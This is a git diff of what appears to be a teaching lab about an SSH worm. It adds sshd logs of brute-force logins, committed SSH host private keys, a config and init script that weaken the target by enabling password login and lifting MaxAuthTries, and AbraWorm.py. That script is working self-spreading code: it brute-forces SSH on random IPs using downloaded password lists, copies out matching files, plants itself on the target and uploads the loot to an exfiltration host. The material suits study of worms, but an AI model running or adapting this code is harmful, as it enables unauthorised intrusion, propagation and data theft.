+2023-11-07 09:18:09.848681673 Connection closed by invalid user account 172.18.0.1 port 62916 [preauth] +2023-11-07 09:18:09.851578339 Connection closed by invalid user kali 172.18.0.1 port 56080 [preauth] +2023-11-07 09:18:09.851604756 Connection closed by invalid user vagrant 172.18.0.1 port 56078 [preauth] +2023-11-07 09:18:09.851605589 Connection closed by invalid user admin 172.18.0.1 port 62914 [preauth] +2023-11-07 09:19:40.981733090 Received signal 15; terminating. +2023-11-07 10:26:50.175887674 Server listening on 0.0.0.0 port 2222. +2023-11-07 10:26:50.175937633 Server listening on :: port 2222. +2023-11-07 10:26:51.206263550 kex_exchange_identification: Connection closed by remote host +2023-11-07 10:26:51.206266383 Connection closed by 127.0.0.1 port 51652 +2023-11-07 10:27:03.983907708 Invalid user admin from 172.18.0.1 port 58512 +2023-11-07 10:27:05.026391001 Could not get shadow information for NOUSER +2023-11-07 10:27:05.038054084 Failed password for invalid user admin from 172.18.0.1 port 58512 ssh2 +2023-11-07 10:27:05.093712876 Invalid user account from 172.18.0.1 port 63062 +2023-11-07 10:27:06.126270751 Could not get shadow information for NOUSER +2023-11-07 10:27:06.140345543 Failed password for invalid user account from 172.18.0.1 port 63062 ssh2 +2023-11-07 10:27:06.197442126 Invalid user vagrant from 172.18.0.1 port 63064 +2023-11-07 10:27:07.234654252 Could not get shadow information for NOUSER +2023-11-07 10:27:07.246939085 Failed password for invalid user vagrant from 172.18.0.1 port 63064 ssh2 +2023-11-07 10:27:07.297183335 Invalid user kali from 172.18.0.1 port 63066 +2023-11-07 10:27:08.334107835 Could not get shadow information for NOUSER +2023-11-07 10:27:08.351569002 Failed password for invalid user kali from 172.18.0.1 port 63066 ssh2 +2023-11-07 10:27:09.449011586 Accepted password for user from 172.18.0.1 port 63068 ssh2 +2023-11-07 10:27:15.700639381 Connection closed by invalid user account 172.18.0.1 port 63062 [preauth] +2023-11-07 10:27:15.700642714 Connection closed by invalid user admin 172.18.0.1 port 58512 [preauth] +2023-11-07 10:27:15.700646339 Connection closed by invalid user kali 172.18.0.1 port 63066 [preauth] +2023-11-07 10:27:15.702313006 Connection closed by invalid user vagrant 172.18.0.1 port 63064 [preauth] diff --git a/user/config/logs/openssh/lock b/user/config/logs/openssh/lock new file mode 100644 index 0000000..e69de29 diff --git a/user/config/logs/openssh/state b/user/config/logs/openssh/state new file mode 100644 index 0000000..e69de29 diff --git a/user/config/ssh_host_keys/ssh_host_ecdsa_key b/user/config/ssh_host_keys/ssh_host_ecdsa_key new file mode 100644 index 0000000..2ec806d --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ecdsa_key @@ -0,0 +1,9 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS +1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQTTv/T/PIE5YWHIdfCWdp/09PnmfJow +CiUiHDv/EXogVtruvVv4nQ0e4jg168UBDZ0wt/TGC4pjnDwW3h3SmsjRAAAAuClmpmMpZq +ZjAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNO/9P88gTlhYch1 +8JZ2n/T0+eZ8mjAKJSIcO/8ReiBW2u69W/idDR7iODXrxQENnTC39MYLimOcPBbeHdKayN +EAAAAhAMeKhouNJiFnVM3/PYyK7BMG/IHRWib9RFt1g0O2qg8QAAAAGHJvb3RAb3BlbnNz +aC1zZXJ2ZXItdXNlcgECAwQFBgc= +-----END OPENSSH PRIVATE KEY----- diff --git a/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub b/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub new file mode 100644 index 0000000..dc3b792 --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub @@ -0,0 +1 @@ +ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNO/9P88gTlhYch18JZ2n/T0+eZ8mjAKJSIcO/8ReiBW2u69W/idDR7iODXrxQENnTC39MYLimOcPBbeHdKayNE= root@openssh-server-user diff --git a/user/config/ssh_host_keys/ssh_host_ed25519_key b/user/config/ssh_host_keys/ssh_host_ed25519_key new file mode 100644 index 0000000..60fae66 --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ed25519_key @@ -0,0 +1,7 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW +QyNTUxOQAAACAOvTrEihdSh3hCS8fp2/nj8W0HKI4gGjQeRz5W0lPLFgAAAKD7c6Ab+3Og +GwAAAAtzc2gtZWQyNTUxOQAAACAOvTrEihdSh3hCS8fp2/nj8W0HKI4gGjQeRz5W0lPLFg +AAAEB/Lxu1xdaGLKbXr00dXVo1KrIzfa4Fmj1QnO81cfFHJg69OsSKF1KHeEJLx+nb+ePx +bQcojiAaNB5HPlbSU8sWAAAAGHJvb3RAb3BlbnNzaC1zZXJ2ZXItdXNlcgECAwQF +-----END OPENSSH PRIVATE KEY----- diff --git a/user/config/ssh_host_keys/ssh_host_ed25519_key.pub b/user/config/ssh_host_keys/ssh_host_ed25519_key.pub new file mode 100644 index 0000000..1f1dc57 --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ed25519_key.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA69OsSKF1KHeEJLx+nb+ePxbQcojiAaNB5HPlbSU8sW root@openssh-server-user diff --git a/user/config/ssh_host_keys/ssh_host_rsa_key b/user/config/ssh_host_keys/ssh_host_rsa_key new file mode 100644 index 0000000..daa81ab --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_rsa_key @@ -0,0 +1,38 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +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 +-----END OPENSSH PRIVATE KEY----- diff --git a/user/config/ssh_host_keys/ssh_host_rsa_key.pub b/user/config/ssh_host_keys/ssh_host_rsa_key.pub new file mode 100644 index 0000000..8893e1e --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_rsa_key.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDlU+Q6ZsGursA2jxbrBmoQycbdZHdJ+YubhYupDJMGECgE9YhmB92tn2eH3K1O7BEdSDHav5hnzid/2T24+RROj0XlbKXqurTirFqhqhH7pS4PdeFDZWecArFJPJ+n33C5F9KBxBHi1LX1DSN6yryf8E9ajjxd7BO+bOJ6W7E1YCgcpfkt0tRSk6vGzrXnaLP3GTQbmpmo4LVWq7rTv7bFNunHeD4KYtwDuyW+2rJLdwWxT4j0pbkD3bShN74198JIqHa4SSnPkT3ia2nLsayJckyWDjLvqdTe9auuisPHiuH9Z2E9sDIWCzfEQlpupqxvpw3SYvyM4d7Avhfy0cWocy8IKItWvJpS36laWW5MBFxUh180FMeMeQVzOfbFmFFkAbif0NoGe2ub1mBUgRXRgAM2A3WnonpLmHzcRn+yAabFX3tMABe4DEeZ+6t0zehGESsVCRdohh7wLePUY9hhwoDQM43nTw3L+B6f6G+TPykTyLPwBgEOMNHKmERv5CM= root@openssh-server-user diff --git a/user/config/ssh_host_keys/sshd_config b/user/config/ssh_host_keys/sshd_config new file mode 100644 index 0000000..be594bd --- /dev/null +++ b/user/config/ssh_host_keys/sshd_config @@ -0,0 +1,117 @@ +# $OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $ + +# This is the sshd server system-wide configuration file. See +# sshd_config(5) for more information. + +# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + +# The strategy used for options in the default sshd_config shipped with +# OpenSSH is to specify options with their default value where +# possible, but leave them commented. Uncommented options override the +# default value. + +Port 2222 +#AddressFamily any +#ListenAddress 0.0.0.0 +#ListenAddress :: + +#HostKey /etc/ssh/ssh_host_rsa_key +#HostKey /etc/ssh/ssh_host_ecdsa_key +#HostKey /etc/ssh/ssh_host_ed25519_key + +# Ciphers and keying +#RekeyLimit default none + +# Logging +#SyslogFacility AUTH +#LogLevel INFO + +# Authentication: + +#LoginGraceTime 2m +#PermitRootLogin prohibit-password +#StrictModes yes +#MaxAuthTries 2147483647 +#MaxSessions 10 + +#PubkeyAuthentication yes + +# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2 +# but this is overridden so installations will only check .ssh/authorized_keys +AuthorizedKeysFile .ssh/authorized_keys + +#AuthorizedPrincipalsFile none + +#AuthorizedKeysCommand none +#AuthorizedKeysCommandUser nobody + +# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts +#HostbasedAuthentication no +# Change to yes if you don't trust ~/.ssh/known_hosts for +# HostbasedAuthentication +#IgnoreUserKnownHosts no +# Don't read the user's ~/.rhosts and ~/.shosts files +#IgnoreRhosts yes + +# To disable tunneled clear text passwords, change to no here! +PasswordAuthentication yes +#PermitEmptyPasswords no + +# Change to no to disable s/key passwords +#KbdInteractiveAuthentication yes + +# Kerberos options +#KerberosAuthentication no +#KerberosOrLocalPasswd yes +#KerberosTicketCleanup yes +#KerberosGetAFSToken no + +# GSSAPI options +#GSSAPIAuthentication no +#GSSAPICleanupCredentials yes + +# Set this to 'yes' to enable PAM authentication, account processing, +# and session processing. If this is enabled, PAM authentication will +# be allowed through the KbdInteractiveAuthentication and +# PasswordAuthentication. Depending on your PAM configuration, +# PAM authentication via KbdInteractiveAuthentication may bypass +# the setting of "PermitRootLogin prohibit-password". +# If you just want the PAM account and session checks to run without +# PAM authentication, then enable this but set PasswordAuthentication +# and KbdInteractiveAuthentication to 'no'. +#UsePAM no + +#AllowAgentForwarding yes +# Feel free to re-enable these if your use case requires them. +AllowTcpForwarding no +GatewayPorts no +X11Forwarding no +#X11DisplayOffset 10 +#X11UseLocalhost yes +#PermitTTY yes +#PrintMotd yes +#PrintLastLog yes +#TCPKeepAlive yes +#PermitUserEnvironment no +#Compression delayed +#ClientAliveInterval 0 +#ClientAliveCountMax 3 +#UseDNS no +PidFile /config/sshd.pid +#MaxStartups 10:30:100 +#PermitTunnel no +#ChrootDirectory none +#VersionAddendum none + +# no default banner path +#Banner none + +# override default of no subsystems +Subsystem sftp internal-sftp + +# Example of overriding settings on a per-user basis +#Match User anoncvs +# X11Forwarding no +# AllowTcpForwarding no +# PermitTTY no +# ForceCommand cvs server diff --git a/user/config/sshd.pid b/user/config/sshd.pid new file mode 100644 index 0000000..f07e286 --- /dev/null +++ b/user/config/sshd.pid @@ -0,0 +1 @@ +175 diff --git a/user/config/test.txt b/user/config/test.txt new file mode 100644 index 0000000..019bad6 --- /dev/null +++ b/user/config/test.txt @@ -0,0 +1,2 @@ +abracadabra +File di esempio che verrebbe esfiltrato diff --git a/user/init-scripts/disable-maxauth.sh b/user/init-scripts/disable-maxauth.sh new file mode 100755 index 0000000..98dd8f5 --- /dev/null +++ b/user/init-scripts/disable-maxauth.sh @@ -0,0 +1,4 @@ +#!/bin/bash + +echo "*** DISABLING MaxAuthTries ***" +sed -i 's/MaxAuthTries .*/MaxAuthTries 2147483647/g' /etc/ssh/sshd_config diff --git a/worm/AbraWorm.py b/worm/AbraWorm.py new file mode 100644 index 0000000..ee7b466 --- /dev/null +++ b/worm/AbraWorm.py @@ -0,0 +1,285 @@ +#!/usr/bin/env python + +### AbraWorm.py + +### Author: Avi kak (kak@purdue.edu) +### Date: April 8, 2016 + +## This is a harmless worm meant for educational purposes only. It can +## only attack machines that run SSH servers and those too only under +## very special conditions that are described below. Its primary features +## are: +## +## -- It tries to break in with SSH login into a randomly selected set of +## hosts with a randomly selected set of usernames and with a randomly +## chosen set of passwords. +## +## -- If it can break into a host, it looks for the files that contain the +## string `abracadabra'. It downloads such files into the host where +## the worm resides. +## +## -- It uploads the files thus exfiltrated from an infected machine to a +## designated host in the internet. You'd need to supply the IP address +## and login credentials at the location marked yyy.yyy.yyy.yyy in the +## code for this feature to work. The exfiltrated files would be +## uploaded to the host at yyy.yyy.yyy.yyy. If you don't supply this +## information, the worm will still work, but now the files exfiltrated +## from the infected machines will stay at the host where the worm +## resides. For an actual worm, the host selected for yyy.yyy.yyy.yyy +## would be a previosly infected host. +## +## -- It installs a copy of itself on the remote host that it successfully +## breaks into. If a user on that machine executes the file thus +## installed (say by clicking on it), the worm activates itself on +## that host. +## +## -- Once the worm is launched in an infected host, it runs in an +## infinite loop, looking for vulnerable hosts in the internet. By +## vulnerable I mean the hosts for which it can successfully guess at +## least one username and the corresponding password. +## +## -- IMPORTANT: After the worm has landed in a remote host, the worm can +## be activated on that machine only if Python is installed on that +## machine. Another condition that must hold at the remote machine is +## that it must have the Python modules paramiko and scp installed. +## +## -- The username and password construction strategies used in the worm +## are highly unlikely to result in actual usernames and actual +## passwords anywhere. (However, for demonstrating the worm code in +## an educational program, this part of the code can be replaced with +## a more potent algorithm.) +## +## -- Given all of the conditions I have listed above for this worm to +## propagate into the internet, we can be quite certain that it is not +## going to cause any harm. Nonetheless, the worm should prove useful +## as an educational exercise. +## +## +## If you want to play with the worm, run it first in the `debug' mode. +## For the debug mode of execution, you would need to supply the following +## information to the worm: +## +## 1) Change to 1 the value of the variable $debug. +## +## 2) Provide an IP address and the login credentials for a host that you +## have access to and that contains one or more documents that +## include the string "abracadabra". This information needs to go +## where you see xxx.xxx.xxx.xxx in the code. +## +## 3) Provide an IP address and the login credentials for a host that +## will serve as the destination for the files exfiltrated from the +## successfully infected hosts. The IP address and the login +## credentials go where you find the string yyy.yyy.yyy.yyy in the +## code. +## +## After you have executed the worm code, you will notice that a copy of +## the worm has landed at the host at the IP address you used for +## xxx.xxx.xxx.xxx and you'll see a new directory at the host you used for +## yyy.yyy.yyy.yyy. This directory will contain those files from the +## xxx.xxx.xxx.xxx host that contained the string `abracadabra'. + +import sys +import os +import random +import paramiko +import scp +import select +import signal +import requests +import time + +users = None +passwords = None + + +## You would want to uncomment the following two lines for the worm to +## work silently: +#sys.stdout = open(os.devnull, 'w') +#sys.stderr = open(os.devnull, 'w') + +def sig_handler(signum,frame): os.kill(os.getpid(),signal.SIGKILL) +signal.signal(signal.SIGINT, sig_handler) + +debug = 1 # IMPORTANT: Before changing this setting, read the last + # paragraph of the main comment block above. As + # mentioned there, you need to provide two IP + # addresses in order to run this code in debug + # mode. + +## The following numbers do NOT mean that the worm will attack only 3 +## hosts for 3 different usernames and 3 different passwords. Since the +## worm operates in an infinite loop, at each iteration, it generates a +## fresh batch of hosts, usernames, and passwords. +NHOSTS = NUSERNAMES = NPASSWDS = 3 + +def get_password_list(): + if debug == 1: return ['password', 'adjfhfad', 'idhf', 'dhf931f'] + r = requests.get('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt') + return r.text.split('\n') + +def get_user_list(): + if debug == 1: return ['test', 'user', 'mario', 'matteo'] + r = requests.get('https://raw.githubusercontent.com/jeanphorn/wordlist/master/usernames.txt') + return r.text.split("\n") + +def get_new_usernames(how_many): + global users + if debug == 1: return ["admin", "account", "vagrant", "kali", "user", "adaliah", "adversary"] + if how_many == 0: return 0 + users = users if users else get_user_list() + return random.sample(users,how_many) + +def get_new_passwds(how_many): + global passwords + if how_many == 0: return 0 + passwords = passwords if passwords else get_password_list() + if debug == 1: return passwords[:100] + return random.sample(passwords,how_many) + +def get_fresh_ipaddresses(how_many): + if debug == 1: return ["127.0.0.1"] + if how_many == 0: return 0 + ipaddresses = [] + for i in range(how_many): + first,second,third,fourth = map(lambda x: str(1 + random.randint(0,x)), [223,223,223,223]) + ipaddresses.append( first + '.' + second + '.' + third + '.' + fourth ) + return ipaddresses + +def run_ssh_command(ssh, cmd): + + _, stdout_, stderr_ = ssh.exec_command(cmd) + + stdout_.channel.recv_exit_status() + stderr_.channel.recv_exit_status() + + out = stdout_.readlines() + err = stderr_.readlines() + + if debug == 1: + print(f'\tstdout:{out}') + if len(stderr_.readlines()) > 0: + print(f'\tstderr:{err}') + return [] + + return out + +# For the same IP address, we do not want to loop through multiple user +# names and passwords consecutively since we do not want to be quarantined +# by a tool like DenyHosts at the other end. So let's reverse the order +# of looping. +def main(): + while True: + usernames = get_new_usernames(NUSERNAMES) + passwds = get_new_passwds(NPASSWDS) + # print("usernames: %s" % str(usernames)) + # print("passwords: %s" % str(passwds)) + # First loop over passwords + for passwd in passwds: + # Then loop over user names + for user in usernames: + # And, finally, loop over randomly chosen IP addresses + for ip_address in get_fresh_ipaddresses(NHOSTS): + host = f'{user}@{ip_address}' + print(f'{host} -> {passwd}') + files_of_interest_at_target = [] + try: + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + ssh.connect(ip_address,port=22,username=user,password=passwd,timeout=5) + print(f'Connected {user}@{ip_address} -> {passwd}') + + # Let's make sure that the target host was not previously + # infected: + received_list = None + cmd = 'ls' + print(f'[{host}] executing: {cmd}') + received_list = run_ssh_command(ssh, cmd) + + if not received_list: + next + + print(f'Checking if target is already infected') + if debug == 1: time.sleep(5) + if ''.join(received_list).find('AbraWorm') >= 0: + print(f'{host} already infected, found AbraWorm in {received_list}') + next + else: + print(f'{host} not infected') + + # Now let's look for files that contain the string 'abracadabra' + cmd = 'grep -ls abracadabra *' + print(f'Checking for interesting files') + print(f'[{host}] executing: {cmd}') + if debug == 1: time.sleep(5) + received_list = run_ssh_command(ssh, cmd) + + if not received_list: + next + + for item in received_list: + files_of_interest_at_target.append(item.strip()) + print(f'Files of interest at the target: {files_of_interest_at_target}') + if debug == 1: time.sleep(5) + + scpcon = scp.SCPClient(ssh.get_transport()) + if len(files_of_interest_at_target) > 0: + for target_file in files_of_interest_at_target: + print(f'[DEBUG] Copy file {target_file}') + if debug == 1: time.sleep(5) + scpcon.get(target_file) + + # Now deposit a copy of AbraWorm.py at the target host: + print(f'[DEBUG] Copy AbraWorm in target') + scpcon.put(sys.argv[0]) + scpcon.close() + if debug == 1: time.sleep(5) + + print(f'[DEBUG] Cheking {host} for worm deploy, executing: {cmd}') + received_list = run_ssh_command(ssh, cmd) + print(f'{received_list}') + if debug == 1: time.sleep(5) + + except Exception as e: + print(f'Exception catched: {e}') + next + + # Now upload the exfiltrated files to a specially designated host, + # which can be a previously infected host. The worm will only + # use those previously infected hosts as destinations for + # exfiltrated files if it was able to send the login credentials + # used on those hosts to its human masters through, say, a + # secret IRC channel. (See Lecture 29 on IRC) + if len(files_of_interest_at_target) > 0: + print(f'Will now try to exfiltrate the files') + if debug == 1: time.sleep(5) + try: + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + + # For exfiltration demo to work, you must provide an IP address and the login + # credentials in the next statement: + ssh.connect('127.0.0.1',port=12345,username='seed',password='dees',timeout=5) + scpcon = scp.SCPClient(ssh.get_transport()) + print(f'Connected to exhiltration host') + + for filename in files_of_interest_at_target: + scpcon.put(filename) + scpcon.close() + + if debug == 1: time.sleep(5) + print(f'Summary') + print(f'Extracting file:') + for filename in files_of_interest_at_target: + print(f'- {filename}') + + + except: + print("No uploading of exfiltrated files\n") + next + + if debug == 1: + return + + +if __name__ == "__main__": + main()